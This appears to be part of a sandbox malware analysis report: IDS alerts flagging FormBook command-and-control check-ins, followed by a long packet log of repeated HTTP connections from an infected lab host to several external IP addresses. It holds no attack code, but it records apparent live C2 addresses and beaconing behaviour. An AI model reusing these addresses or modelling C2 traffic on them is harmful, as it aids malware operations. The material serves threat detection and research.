                                                          2024-11-20T10:18:49.504711+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749993188.114.97.380TCP
                                                          2024-11-20T10:18:52.191366+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749994188.114.97.380TCP
                                                          2024-11-20T10:18:52.191366+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749994188.114.97.380TCP
                                                          2024-11-20T10:18:58.111188+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749995154.88.22.11080TCP
                                                          2024-11-20T10:19:00.671339+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749996154.88.22.11080TCP
                                                          2024-11-20T10:19:03.219160+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749997154.88.22.11080TCP
                                                          2024-11-20T10:19:05.772813+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749998154.88.22.11080TCP
                                                          2024-11-20T10:19:05.772813+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749998154.88.22.11080TCP
                                                          2024-11-20T10:19:11.426062+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749999209.74.77.10780TCP
                                                          2024-11-20T10:19:13.995780+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.750000209.74.77.10780TCP
                                                          2024-11-20T10:19:16.522665+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.750001209.74.77.10780TCP
                                                          2024-11-20T10:19:19.101738+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.750002209.74.77.10780TCP
                                                          2024-11-20T10:19:19.101738+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.750002209.74.77.10780TCP
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 20, 2024 10:16:57.004666090 CET4989480192.168.2.7161.97.168.245
                                                          Nov 20, 2024 10:16:57.011950016 CET8049894161.97.168.245192.168.2.7
                                                          Nov 20, 2024 10:16:57.013396025 CET4989480192.168.2.7161.97.168.245
                                                          Nov 20, 2024 10:16:57.024030924 CET4989480192.168.2.7161.97.168.245
                                                          Nov 20, 2024 10:16:57.033113956 CET8049894161.97.168.245192.168.2.7
                                                          Nov 20, 2024 10:16:57.621364117 CET8049894161.97.168.245192.168.2.7
                                                          Nov 20, 2024 10:16:57.621500015 CET8049894161.97.168.245192.168.2.7
                                                          Nov 20, 2024 10:16:57.621515036 CET8049894161.97.168.245192.168.2.7
                                                          Nov 20, 2024 10:16:57.621532917 CET8049894161.97.168.245192.168.2.7
                                                          Nov 20, 2024 10:16:57.621627092 CET4989480192.168.2.7161.97.168.245
                                                          Nov 20, 2024 10:16:57.621678114 CET4989480192.168.2.7161.97.168.245
                                                          Nov 20, 2024 10:16:57.621805906 CET8049894161.97.168.245192.168.2.7
                                                          Nov 20, 2024 10:16:57.621850967 CET4989480192.168.2.7161.97.168.245
                                                          Nov 20, 2024 10:16:57.627084017 CET4989480192.168.2.7161.97.168.245
                                                          Nov 20, 2024 10:16:57.634783983 CET8049894161.97.168.245192.168.2.7
                                                          Nov 20, 2024 10:17:13.253046036 CET4997080192.168.2.727.124.4.246
                                                          Nov 20, 2024 10:17:13.259922028 CET804997027.124.4.246192.168.2.7
                                                          Nov 20, 2024 10:17:13.260020971 CET4997080192.168.2.727.124.4.246
                                                          Nov 20, 2024 10:17:13.276117086 CET4997080192.168.2.727.124.4.246
                                                          Nov 20, 2024 10:17:13.281745911 CET804997027.124.4.246192.168.2.7
                                                          Nov 20, 2024 10:17:14.157342911 CET804997027.124.4.246192.168.2.7
                                                          Nov 20, 2024 10:17:14.191111088 CET804997027.124.4.246192.168.2.7
                                                          Nov 20, 2024 10:17:14.191219091 CET4997080192.168.2.727.124.4.246
                                                          Nov 20, 2024 10:17:14.779429913 CET4997080192.168.2.727.124.4.246
                                                          Nov 20, 2024 10:17:15.799396992 CET4997180192.168.2.727.124.4.246
                                                          Nov 20, 2024 10:17:15.804389954 CET804997127.124.4.246192.168.2.7
                                                          Nov 20, 2024 10:17:15.804538965 CET4997180192.168.2.727.124.4.246
                                                          Nov 20, 2024 10:17:15.821557999 CET4997180192.168.2.727.124.4.246
                                                          Nov 20, 2024 10:17:15.826462984 CET804997127.124.4.246192.168.2.7
                                                          Nov 20, 2024 10:17:16.640511990 CET804997127.124.4.246192.168.2.7
                                                          Nov 20, 2024 10:17:16.685677052 CET4997180192.168.2.727.124.4.246
                                                          Nov 20, 2024 10:17:16.733396053 CET804997127.124.4.246192.168.2.7
                                                          Nov 20, 2024 10:17:16.733549118 CET4997180192.168.2.727.124.4.246
                                                          Nov 20, 2024 10:17:17.326461077 CET4997180192.168.2.727.124.4.246
                                                          Nov 20, 2024 10:17:18.346851110 CET4997280192.168.2.727.124.4.246
                                                          Nov 20, 2024 10:17:18.351747036 CET804997227.124.4.246192.168.2.7
                                                          Nov 20, 2024 10:17:18.351835012 CET4997280192.168.2.727.124.4.246
                                                          Nov 20, 2024 10:17:18.369436979 CET4997280192.168.2.727.124.4.246
                                                          Nov 20, 2024 10:17:18.374386072 CET804997227.124.4.246192.168.2.7
                                                          Nov 20, 2024 10:17:18.374469042 CET804997227.124.4.246192.168.2.7
                                                          Nov 20, 2024 10:17:19.189469099 CET804997227.124.4.246192.168.2.7
                                                          Nov 20, 2024 10:17:19.232574940 CET4997280192.168.2.727.124.4.246
                                                          Nov 20, 2024 10:17:19.278667927 CET804997227.124.4.246192.168.2.7
                                                          Nov 20, 2024 10:17:19.278784990 CET4997280192.168.2.727.124.4.246
                                                          Nov 20, 2024 10:17:19.873307943 CET4997280192.168.2.727.124.4.246
                                                          Nov 20, 2024 10:17:20.892474890 CET4997380192.168.2.727.124.4.246
                                                          Nov 20, 2024 10:17:20.900511026 CET804997327.124.4.246192.168.2.7
                                                          Nov 20, 2024 10:17:20.900625944 CET4997380192.168.2.727.124.4.246
                                                          Nov 20, 2024 10:17:20.910490036 CET4997380192.168.2.727.124.4.246
                                                          Nov 20, 2024 10:17:20.915440083 CET804997327.124.4.246192.168.2.7
                                                          Nov 20, 2024 10:17:21.834981918 CET804997327.124.4.246192.168.2.7
                                                          Nov 20, 2024 10:17:21.888856888 CET4997380192.168.2.727.124.4.246
                                                          Nov 20, 2024 10:17:21.933466911 CET804997327.124.4.246192.168.2.7
                                                          Nov 20, 2024 10:17:21.933657885 CET4997380192.168.2.727.124.4.246
                                                          Nov 20, 2024 10:17:21.934518099 CET4997380192.168.2.727.124.4.246
                                                          Nov 20, 2024 10:17:21.965828896 CET804997327.124.4.246192.168.2.7
                                                          Nov 20, 2024 10:17:27.403147936 CET4997480192.168.2.7149.88.81.190
                                                          Nov 20, 2024 10:17:27.413427114 CET8049974149.88.81.190192.168.2.7
                                                          Nov 20, 2024 10:17:27.413561106 CET4997480192.168.2.7149.88.81.190
                                                          Nov 20, 2024 10:17:27.429315090 CET4997480192.168.2.7149.88.81.190
                                                          Nov 20, 2024 10:17:27.435436964 CET8049974149.88.81.190192.168.2.7
                                                          Nov 20, 2024 10:17:28.936069012 CET4997480192.168.2.7149.88.81.190
                                                          Nov 20, 2024 10:17:28.999903917 CET8049974149.88.81.190192.168.2.7
                                                          Nov 20, 2024 10:17:29.954590082 CET4997580192.168.2.7149.88.81.190
                                                          Nov 20, 2024 10:17:29.967951059 CET8049975149.88.81.190192.168.2.7
                                                          Nov 20, 2024 10:17:29.968036890 CET4997580192.168.2.7149.88.81.190
                                                          Nov 20, 2024 10:17:29.990690947 CET4997580192.168.2.7149.88.81.190
                                                          Nov 20, 2024 10:17:30.004390001 CET8049975149.88.81.190192.168.2.7
                                                          Nov 20, 2024 10:17:31.498558044 CET4997580192.168.2.7149.88.81.190
                                                          Nov 20, 2024 10:17:31.551228046 CET8049975149.88.81.190192.168.2.7
                                                          Nov 20, 2024 10:17:32.525535107 CET4997680192.168.2.7149.88.81.190
                                                          Nov 20, 2024 10:17:32.534105062 CET8049976149.88.81.190192.168.2.7
                                                          Nov 20, 2024 10:17:32.534532070 CET4997680192.168.2.7149.88.81.190
                                                          Nov 20, 2024 10:17:32.550837040 CET4997680192.168.2.7149.88.81.190
                                                          Nov 20, 2024 10:17:32.564109087 CET8049976149.88.81.190192.168.2.7
                                                          Nov 20, 2024 10:17:32.564220905 CET8049976149.88.81.190192.168.2.7
                                                          Nov 20, 2024 10:17:34.060878038 CET4997680192.168.2.7149.88.81.190
                                                          Nov 20, 2024 10:17:34.109392881 CET8049976149.88.81.190192.168.2.7
                                                          Nov 20, 2024 10:17:35.079879045 CET4997880192.168.2.7149.88.81.190
                                                          Nov 20, 2024 10:17:35.086236000 CET8049978149.88.81.190192.168.2.7
                                                          Nov 20, 2024 10:17:35.086322069 CET4997880192.168.2.7149.88.81.190
                                                          Nov 20, 2024 10:17:35.097934008 CET4997880192.168.2.7149.88.81.190
                                                          Nov 20, 2024 10:17:35.103032112 CET8049978149.88.81.190192.168.2.7
                                                          Nov 20, 2024 10:17:48.776410103 CET8049974149.88.81.190192.168.2.7
                                                          Nov 20, 2024 10:17:48.776614904 CET4997480192.168.2.7149.88.81.190
                                                          Nov 20, 2024 10:17:51.343916893 CET8049975149.88.81.190192.168.2.7
                                                          Nov 20, 2024 10:17:51.343995094 CET4997580192.168.2.7149.88.81.190
                                                          Nov 20, 2024 10:17:53.924025059 CET8049976149.88.81.190192.168.2.7
                                                          Nov 20, 2024 10:17:53.924108028 CET4997680192.168.2.7149.88.81.190
                                                          Nov 20, 2024 10:17:56.482929945 CET8049978149.88.81.190192.168.2.7
                                                          Nov 20, 2024 10:17:56.483266115 CET4997880192.168.2.7149.88.81.190
                                                          Nov 20, 2024 10:17:56.484038115 CET4997880192.168.2.7149.88.81.190
                                                          Nov 20, 2024 10:17:56.491776943 CET8049978149.88.81.190192.168.2.7
                                                          Nov 20, 2024 10:18:01.715584040 CET4997980192.168.2.785.159.66.93
                                                          Nov 20, 2024 10:18:01.723056078 CET804997985.159.66.93192.168.2.7
                                                          Nov 20, 2024 10:18:01.723323107 CET4997980192.168.2.785.159.66.93
                                                          Nov 20, 2024 10:18:01.740593910 CET4997980192.168.2.785.159.66.93
                                                          Nov 20, 2024 10:18:01.745799065 CET804997985.159.66.93192.168.2.7
                                                          Nov 20, 2024 10:18:03.248548985 CET4997980192.168.2.785.159.66.93
                                                          Nov 20, 2024 10:18:03.253864050 CET804997985.159.66.93192.168.2.7
                                                          Nov 20, 2024 10:18:03.253941059 CET4997980192.168.2.785.159.66.93
                                                          Nov 20, 2024 10:18:04.267900944 CET4998080192.168.2.785.159.66.93
                                                          Nov 20, 2024 10:18:04.272970915 CET804998085.159.66.93192.168.2.7
                                                          Nov 20, 2024 10:18:04.273156881 CET4998080192.168.2.785.159.66.93
                                                          Nov 20, 2024 10:18:04.288911104 CET4998080192.168.2.785.159.66.93
                                                          Nov 20, 2024 10:18:04.293910980 CET804998085.159.66.93192.168.2.7
                                                          Nov 20, 2024 10:18:05.795334101 CET4998080192.168.2.785.159.66.93
                                                          Nov 20, 2024 10:18:05.800642967 CET804998085.159.66.93192.168.2.7
                                                          Nov 20, 2024 10:18:05.801563978 CET4998080192.168.2.785.159.66.93
                                                          Nov 20, 2024 10:18:06.814363956 CET4998180192.168.2.785.159.66.93
                                                          Nov 20, 2024 10:18:06.938497066 CET804998185.159.66.93192.168.2.7
                                                          Nov 20, 2024 10:18:06.938652992 CET4998180192.168.2.785.159.66.93
                                                          Nov 20, 2024 10:18:06.953710079 CET4998180192.168.2.785.159.66.93
                                                          Nov 20, 2024 10:18:06.960804939 CET804998185.159.66.93192.168.2.7
                                                          Nov 20, 2024 10:18:06.960819006 CET804998185.159.66.93192.168.2.7
                                                          Nov 20, 2024 10:18:08.467622042 CET4998180192.168.2.785.159.66.93
                                                          Nov 20, 2024 10:18:08.473470926 CET804998185.159.66.93192.168.2.7
                                                          Nov 20, 2024 10:18:08.473638058 CET4998180192.168.2.785.159.66.93
                                                          Nov 20, 2024 10:18:09.485563040 CET4998280192.168.2.785.159.66.93
                                                          Nov 20, 2024 10:18:09.500490904 CET804998285.159.66.93192.168.2.7
                                                          Nov 20, 2024 10:18:09.500638008 CET4998280192.168.2.785.159.66.93
                                                          Nov 20, 2024 10:18:09.509727955 CET4998280192.168.2.785.159.66.93
                                                          Nov 20, 2024 10:18:09.523617983 CET804998285.159.66.93192.168.2.7
                                                          Nov 20, 2024 10:18:10.266968966 CET804998285.159.66.93192.168.2.7
                                                          Nov 20, 2024 10:18:10.266985893 CET804998285.159.66.93192.168.2.7
                                                          Nov 20, 2024 10:18:10.267271996 CET4998280192.168.2.785.159.66.93
                                                          Nov 20, 2024 10:18:10.270431042 CET4998280192.168.2.785.159.66.93
                                                          Nov 20, 2024 10:18:10.275357008 CET804998285.159.66.93192.168.2.7
                                                          Nov 20, 2024 10:18:15.352916002 CET4998380192.168.2.7185.27.134.144
                                                          Nov 20, 2024 10:18:15.359345913 CET8049983185.27.134.144192.168.2.7
                                                          Nov 20, 2024 10:18:15.359426975 CET4998380192.168.2.7185.27.134.144
                                                          Nov 20, 2024 10:18:15.374806881 CET4998380192.168.2.7185.27.134.144
                                                          Nov 20, 2024 10:18:15.379738092 CET8049983185.27.134.144192.168.2.7
                                                          Nov 20, 2024 10:18:15.987128973 CET8049983185.27.134.144192.168.2.7
                                                          Nov 20, 2024 10:18:15.987330914 CET8049983185.27.134.144192.168.2.7
                                                          Nov 20, 2024 10:18:15.987602949 CET4998380192.168.2.7185.27.134.144
                                                          Nov 20, 2024 10:18:16.890965939 CET4998380192.168.2.7185.27.134.144
                                                          Nov 20, 2024 10:18:17.907974005 CET4998480192.168.2.7185.27.134.144
                                                          Nov 20, 2024 10:18:17.912996054 CET8049984185.27.134.144192.168.2.7
                                                          Nov 20, 2024 10:18:17.914736032 CET4998480192.168.2.7185.27.134.144
                                                          Nov 20, 2024 10:18:17.930413008 CET4998480192.168.2.7185.27.134.144
                                                          Nov 20, 2024 10:18:17.935328007 CET8049984185.27.134.144192.168.2.7
                                                          Nov 20, 2024 10:18:18.526820898 CET8049984185.27.134.144192.168.2.7
                                                          Nov 20, 2024 10:18:18.526833057 CET8049984185.27.134.144192.168.2.7
                                                          Nov 20, 2024 10:18:18.527337074 CET4998480192.168.2.7185.27.134.144
                                                          Nov 20, 2024 10:18:19.436184883 CET4998480192.168.2.7185.27.134.144
                                                          Nov 20, 2024 10:18:20.455141068 CET4998580192.168.2.7185.27.134.144
                                                          Nov 20, 2024 10:18:20.461749077 CET8049985185.27.134.144192.168.2.7
                                                          Nov 20, 2024 10:18:20.461934090 CET4998580192.168.2.7185.27.134.144
                                                          Nov 20, 2024 10:18:20.477077961 CET4998580192.168.2.7185.27.134.144
                                                          Nov 20, 2024 10:18:20.489489079 CET8049985185.27.134.144192.168.2.7
                                                          Nov 20, 2024 10:18:20.492916107 CET8049985185.27.134.144192.168.2.7
                                                          Nov 20, 2024 10:18:21.093487978 CET8049985185.27.134.144192.168.2.7
                                                          Nov 20, 2024 10:18:21.096694946 CET8049985185.27.134.144192.168.2.7
                                                          Nov 20, 2024 10:18:21.096781015 CET4998580192.168.2.7185.27.134.144
                                                          Nov 20, 2024 10:18:21.982907057 CET4998580192.168.2.7185.27.134.144
                                                          Nov 20, 2024 10:18:23.005098104 CET4998680192.168.2.7185.27.134.144
                                                          Nov 20, 2024 10:18:23.010767937 CET8049986185.27.134.144192.168.2.7
                                                          Nov 20, 2024 10:18:23.010902882 CET4998680192.168.2.7185.27.134.144
                                                          Nov 20, 2024 10:18:23.023329020 CET4998680192.168.2.7185.27.134.144
                                                          Nov 20, 2024 10:18:23.032150984 CET8049986185.27.134.144192.168.2.7
                                                          Nov 20, 2024 10:18:23.635010958 CET8049986185.27.134.144192.168.2.7
                                                          Nov 20, 2024 10:18:23.635024071 CET8049986185.27.134.144192.168.2.7
                                                          Nov 20, 2024 10:18:23.635241032 CET4998680192.168.2.7185.27.134.144
                                                          Nov 20, 2024 10:18:23.639059067 CET4998680192.168.2.7185.27.134.144
                                                          Nov 20, 2024 10:18:23.644625902 CET8049986185.27.134.144192.168.2.7
                                                          Nov 20, 2024 10:18:30.029033899 CET4998780192.168.2.7172.67.145.234
                                                          Nov 20, 2024 10:18:30.038104057 CET8049987172.67.145.234192.168.2.7
                                                          Nov 20, 2024 10:18:30.038220882 CET4998780192.168.2.7172.67.145.234
                                                          Nov 20, 2024 10:18:30.053014040 CET4998780192.168.2.7172.67.145.234
                                                          Nov 20, 2024 10:18:30.059434891 CET8049987172.67.145.234192.168.2.7
                                                          Nov 20, 2024 10:18:30.624804974 CET8049987172.67.145.234192.168.2.7
                                                          Nov 20, 2024 10:18:30.625579119 CET8049987172.67.145.234192.168.2.7
                                                          Nov 20, 2024 10:18:30.626020908 CET4998780192.168.2.7172.67.145.234
                                                          Nov 20, 2024 10:18:31.561083078 CET4998780192.168.2.7172.67.145.234
                                                          Nov 20, 2024 10:18:32.580214977 CET4998880192.168.2.7172.67.145.234
                                                          Nov 20, 2024 10:18:32.588530064 CET8049988172.67.145.234192.168.2.7
                                                          Nov 20, 2024 10:18:32.588706970 CET4998880192.168.2.7172.67.145.234
                                                          Nov 20, 2024 10:18:32.604346991 CET4998880192.168.2.7172.67.145.234
                                                          Nov 20, 2024 10:18:32.614080906 CET8049988172.67.145.234192.168.2.7
                                                          Nov 20, 2024 10:18:33.218903065 CET8049988172.67.145.234192.168.2.7
                                                          Nov 20, 2024 10:18:33.219635963 CET8049988172.67.145.234192.168.2.7
                                                          Nov 20, 2024 10:18:33.219716072 CET4998880192.168.2.7172.67.145.234
                                                          Nov 20, 2024 10:18:34.108278990 CET4998880192.168.2.7172.67.145.234
                                                          Nov 20, 2024 10:18:35.127007008 CET4998980192.168.2.7172.67.145.234
                                                          Nov 20, 2024 10:18:35.135225058 CET8049989172.67.145.234192.168.2.7
                                                          Nov 20, 2024 10:18:35.135330915 CET4998980192.168.2.7172.67.145.234
                                                          Nov 20, 2024 10:18:35.151011944 CET4998980192.168.2.7172.67.145.234
                                                          Nov 20, 2024 10:18:35.159265995 CET8049989172.67.145.234192.168.2.7
                                                          Nov 20, 2024 10:18:35.159280062 CET8049989172.67.145.234192.168.2.7
                                                          Nov 20, 2024 10:18:35.756067038 CET8049989172.67.145.234192.168.2.7
                                                          Nov 20, 2024 10:18:35.758982897 CET8049989172.67.145.234192.168.2.7
                                                          Nov 20, 2024 10:18:35.759090900 CET4998980192.168.2.7172.67.145.234
                                                          Nov 20, 2024 10:18:36.654911041 CET4998980192.168.2.7172.67.145.234
                                                          Nov 20, 2024 10:18:37.673830032 CET4999080192.168.2.7172.67.145.234
                                                          Nov 20, 2024 10:18:37.682750940 CET8049990172.67.145.234192.168.2.7
                                                          Nov 20, 2024 10:18:37.682852030 CET4999080192.168.2.7172.67.145.234
                                                          Nov 20, 2024 10:18:37.692461967 CET4999080192.168.2.7172.67.145.234
                                                          Nov 20, 2024 10:18:37.703480959 CET8049990172.67.145.234192.168.2.7
                                                          Nov 20, 2024 10:18:38.294605017 CET8049990172.67.145.234192.168.2.7
                                                          Nov 20, 2024 10:18:38.295367002 CET8049990172.67.145.234192.168.2.7
                                                          Nov 20, 2024 10:18:38.295434952 CET4999080192.168.2.7172.67.145.234
                                                          Nov 20, 2024 10:18:38.297781944 CET4999080192.168.2.7172.67.145.234
                                                          Nov 20, 2024 10:18:38.302966118 CET8049990172.67.145.234192.168.2.7
                                                          Nov 20, 2024 10:18:43.449975014 CET4999180192.168.2.7188.114.97.3
                                                          Nov 20, 2024 10:18:43.497836113 CET8049991188.114.97.3192.168.2.7
                                                          Nov 20, 2024 10:18:43.498191118 CET4999180192.168.2.7188.114.97.3
                                                          Nov 20, 2024 10:18:43.513555050 CET4999180192.168.2.7188.114.97.3
                                                          Nov 20, 2024 10:18:43.577044964 CET8049991188.114.97.3192.168.2.7
                                                          Nov 20, 2024 10:18:44.381122112 CET8049991188.114.97.3192.168.2.7
                                                          Nov 20, 2024 10:18:44.381544113 CET8049991188.114.97.3192.168.2.7
                                                          Nov 20, 2024 10:18:44.381635904 CET4999180192.168.2.7188.114.97.3
                                                          Nov 20, 2024 10:18:45.029987097 CET4999180192.168.2.7188.114.97.3
                                                          Nov 20, 2024 10:18:46.074661016 CET4999280192.168.2.7188.114.97.3
                                                          Nov 20, 2024 10:18:46.085916996 CET8049992188.114.97.3192.168.2.7
                                                          Nov 20, 2024 10:18:46.086086035 CET4999280192.168.2.7188.114.97.3
                                                          Nov 20, 2024 10:18:46.185447931 CET4999280192.168.2.7188.114.97.3
                                                          Nov 20, 2024 10:18:46.205755949 CET8049992188.114.97.3192.168.2.7
                                                          Nov 20, 2024 10:18:46.884558916 CET8049992188.114.97.3192.168.2.7
                                                          Nov 20, 2024 10:18:46.887376070 CET8049992188.114.97.3192.168.2.7
                                                          Nov 20, 2024 10:18:46.887428045 CET4999280192.168.2.7188.114.97.3
                                                          Nov 20, 2024 10:18:47.701775074 CET4999280192.168.2.7188.114.97.3
                                                          Nov 20, 2024 10:18:48.742609978 CET4999380192.168.2.7188.114.97.3
                                                          Nov 20, 2024 10:18:48.747478962 CET8049993188.114.97.3192.168.2.7
                                                          Nov 20, 2024 10:18:48.747560024 CET4999380192.168.2.7188.114.97.3
                                                          Nov 20, 2024 10:18:48.841757059 CET4999380192.168.2.7188.114.97.3
                                                          Nov 20, 2024 10:18:48.847505093 CET8049993188.114.97.3192.168.2.7
                                                          Nov 20, 2024 10:18:48.847584009 CET8049993188.114.97.3192.168.2.7
                                                          Nov 20, 2024 10:18:49.504051924 CET8049993188.114.97.3192.168.2.7
                                                          Nov 20, 2024 10:18:49.504662037 CET8049993188.114.97.3192.168.2.7
                                                          Nov 20, 2024 10:18:49.504710913 CET4999380192.168.2.7188.114.97.3
                                                          Nov 20, 2024 10:18:49.504728079 CET8049993188.114.97.3192.168.2.7
                                                          Nov 20, 2024 10:18:49.504774094 CET4999380192.168.2.7188.114.97.3
                                                          Nov 20, 2024 10:18:50.358072996 CET4999380192.168.2.7188.114.97.3
                                                          Nov 20, 2024 10:18:51.417995930 CET4999480192.168.2.7188.114.97.3
                                                          Nov 20, 2024 10:18:51.423137903 CET8049994188.114.97.3192.168.2.7
                                                          Nov 20, 2024 10:18:51.423221111 CET4999480192.168.2.7188.114.97.3
                                                          Nov 20, 2024 10:18:51.442275047 CET4999480192.168.2.7188.114.97.3
                                                          Nov 20, 2024 10:18:51.447134972 CET8049994188.114.97.3192.168.2.7
                                                          Nov 20, 2024 10:18:52.190912962 CET8049994188.114.97.3192.168.2.7
                                                          Nov 20, 2024 10:18:52.191283941 CET8049994188.114.97.3192.168.2.7
                                                          Nov 20, 2024 10:18:52.191365957 CET4999480192.168.2.7188.114.97.3
                                                          Nov 20, 2024 10:18:52.194267988 CET4999480192.168.2.7188.114.97.3
                                                          Nov 20, 2024 10:18:52.201304913 CET8049994188.114.97.3192.168.2.7
                                                          Nov 20, 2024 10:18:57.234122992 CET4999580192.168.2.7154.88.22.110
                                                          Nov 20, 2024 10:18:57.239363909 CET8049995154.88.22.110192.168.2.7
                                                          Nov 20, 2024 10:18:57.239449024 CET4999580192.168.2.7154.88.22.110
                                                          Nov 20, 2024 10:18:57.254673958 CET4999580192.168.2.7154.88.22.110
                                                          Nov 20, 2024 10:18:57.259594917 CET8049995154.88.22.110192.168.2.7
                                                          Nov 20, 2024 10:18:58.110779047 CET8049995154.88.22.110192.168.2.7
                                                          Nov 20, 2024 10:18:58.111044884 CET8049995154.88.22.110192.168.2.7
                                                          Nov 20, 2024 10:18:58.111187935 CET4999580192.168.2.7154.88.22.110
                                                          Nov 20, 2024 10:18:58.764272928 CET4999580192.168.2.7154.88.22.110
                                                          Nov 20, 2024 10:18:59.783361912 CET4999680192.168.2.7154.88.22.110
                                                          Nov 20, 2024 10:18:59.788310051 CET8049996154.88.22.110192.168.2.7
                                                          Nov 20, 2024 10:18:59.788399935 CET4999680192.168.2.7154.88.22.110
                                                          Nov 20, 2024 10:18:59.804099083 CET4999680192.168.2.7154.88.22.110
                                                          Nov 20, 2024 10:18:59.812423944 CET8049996154.88.22.110192.168.2.7
                                                          Nov 20, 2024 10:19:00.670702934 CET8049996154.88.22.110192.168.2.7
                                                          Nov 20, 2024 10:19:00.671150923 CET8049996154.88.22.110192.168.2.7
                                                          Nov 20, 2024 10:19:00.671339035 CET4999680192.168.2.7154.88.22.110
                                                          Nov 20, 2024 10:19:01.311090946 CET4999680192.168.2.7154.88.22.110
                                                          Nov 20, 2024 10:19:02.330087900 CET4999780192.168.2.7154.88.22.110
                                                          Nov 20, 2024 10:19:02.335391998 CET8049997154.88.22.110192.168.2.7
                                                          Nov 20, 2024 10:19:02.335489988 CET4999780192.168.2.7154.88.22.110
                                                          Nov 20, 2024 10:19:02.351340055 CET4999780192.168.2.7154.88.22.110
                                                          Nov 20, 2024 10:19:02.356235027 CET8049997154.88.22.110192.168.2.7
                                                          Nov 20, 2024 10:19:02.356318951 CET8049997154.88.22.110192.168.2.7
                                                          Nov 20, 2024 10:19:03.218929052 CET8049997154.88.22.110192.168.2.7
                                                          Nov 20, 2024 10:19:03.219027042 CET8049997154.88.22.110192.168.2.7
                                                          Nov 20, 2024 10:19:03.219160080 CET4999780192.168.2.7154.88.22.110
                                                          Nov 20, 2024 10:19:03.858263969 CET4999780192.168.2.7154.88.22.110
                                                          Nov 20, 2024 10:19:04.877348900 CET4999880192.168.2.7154.88.22.110
                                                          Nov 20, 2024 10:19:04.884453058 CET8049998154.88.22.110192.168.2.7
                                                          Nov 20, 2024 10:19:04.884660006 CET4999880192.168.2.7154.88.22.110
                                                          Nov 20, 2024 10:19:04.893811941 CET4999880192.168.2.7154.88.22.110
                                                          Nov 20, 2024 10:19:04.900940895 CET8049998154.88.22.110192.168.2.7
                                                          Nov 20, 2024 10:19:05.772592068 CET8049998154.88.22.110192.168.2.7
                                                          Nov 20, 2024 10:19:05.772670984 CET8049998154.88.22.110192.168.2.7
                                                          Nov 20, 2024 10:19:05.772813082 CET4999880192.168.2.7154.88.22.110
                                                          Nov 20, 2024 10:19:05.775712013 CET4999880192.168.2.7154.88.22.110
                                                          Nov 20, 2024 10:19:05.783854961 CET8049998154.88.22.110192.168.2.7
                                                          Nov 20, 2024 10:19:10.827848911 CET4999980192.168.2.7209.74.77.107
                                                          Nov 20, 2024 10:19:10.833627939 CET8049999209.74.77.107192.168.2.7
                                                          Nov 20, 2024 10:19:10.837317944 CET4999980192.168.2.7209.74.77.107
                                                          Nov 20, 2024 10:19:10.850107908 CET4999980192.168.2.7209.74.77.107
                                                          Nov 20, 2024 10:19:10.855072021 CET8049999209.74.77.107192.168.2.7
                                                          Nov 20, 2024 10:19:11.425559998 CET8049999209.74.77.107192.168.2.7
                                                          Nov 20, 2024 10:19:11.425971985 CET8049999209.74.77.107192.168.2.7
                                                          Nov 20, 2024 10:19:11.426062107 CET4999980192.168.2.7209.74.77.107
                                                          Nov 20, 2024 10:19:12.358103037 CET4999980192.168.2.7209.74.77.107
                                                          Nov 20, 2024 10:19:13.377193928 CET5000080192.168.2.7209.74.77.107
                                                          Nov 20, 2024 10:19:13.382302999 CET8050000209.74.77.107192.168.2.7
                                                          Nov 20, 2024 10:19:13.382409096 CET5000080192.168.2.7209.74.77.107
                                                          Nov 20, 2024 10:19:13.396915913 CET5000080192.168.2.7209.74.77.107
                                                          Nov 20, 2024 10:19:13.401767969 CET8050000209.74.77.107192.168.2.7
                                                          Nov 20, 2024 10:19:13.995616913 CET8050000209.74.77.107192.168.2.7
                                                          Nov 20, 2024 10:19:13.995683908 CET8050000209.74.77.107192.168.2.7
                                                          Nov 20, 2024 10:19:13.995779991 CET5000080192.168.2.7209.74.77.107
                                                          Nov 20, 2024 10:19:14.904887915 CET5000080192.168.2.7209.74.77.107
                                                          Nov 20, 2024 10:19:15.923944950 CET5000180192.168.2.7209.74.77.107
                                                          Nov 20, 2024 10:19:15.930881977 CET8050001209.74.77.107192.168.2.7
                                                          Nov 20, 2024 10:19:15.930993080 CET5000180192.168.2.7209.74.77.107
                                                          Nov 20, 2024 10:19:15.950922012 CET5000180192.168.2.7209.74.77.107
                                                          Nov 20, 2024 10:19:15.958442926 CET8050001209.74.77.107192.168.2.7
                                                          Nov 20, 2024 10:19:15.958453894 CET8050001209.74.77.107192.168.2.7
                                                          Nov 20, 2024 10:19:16.522571087 CET8050001209.74.77.107192.168.2.7
                                                          Nov 20, 2024 10:19:16.522589922 CET8050001209.74.77.107192.168.2.7
                                                          Nov 20, 2024 10:19:16.522665024 CET5000180192.168.2.7209.74.77.107
                                                          Nov 20, 2024 10:19:17.467797041 CET5000180192.168.2.7209.74.77.107
                                                          Nov 20, 2024 10:19:18.487202883 CET5000280192.168.2.7209.74.77.107
                                                          Nov 20, 2024 10:19:18.492769957 CET8050002209.74.77.107192.168.2.7
                                                          Nov 20, 2024 10:19:18.492887974 CET5000280192.168.2.7209.74.77.107
                                                          Nov 20, 2024 10:19:18.505306005 CET5000280192.168.2.7209.74.77.107
                                                          Nov 20, 2024 10:19:18.510231018 CET8050002209.74.77.107192.168.2.7
                                                          Nov 20, 2024 10:19:19.101526022 CET8050002209.74.77.107192.168.2.7
                                                          Nov 20, 2024 10:19:19.101660967 CET8050002209.74.77.107192.168.2.7
                                                          Nov 20, 2024 10:19:19.101737976 CET5000280192.168.2.7209.74.77.107
                                                          Nov 20, 2024 10:19:19.105482101 CET5000280192.168.2.7209.74.77.107
                                                          Nov 20, 2024 10:19:19.112442970 CET8050002209.74.77.107192.168.2.7
                                                          TimestampSource PortDest PortSource IPDest IP
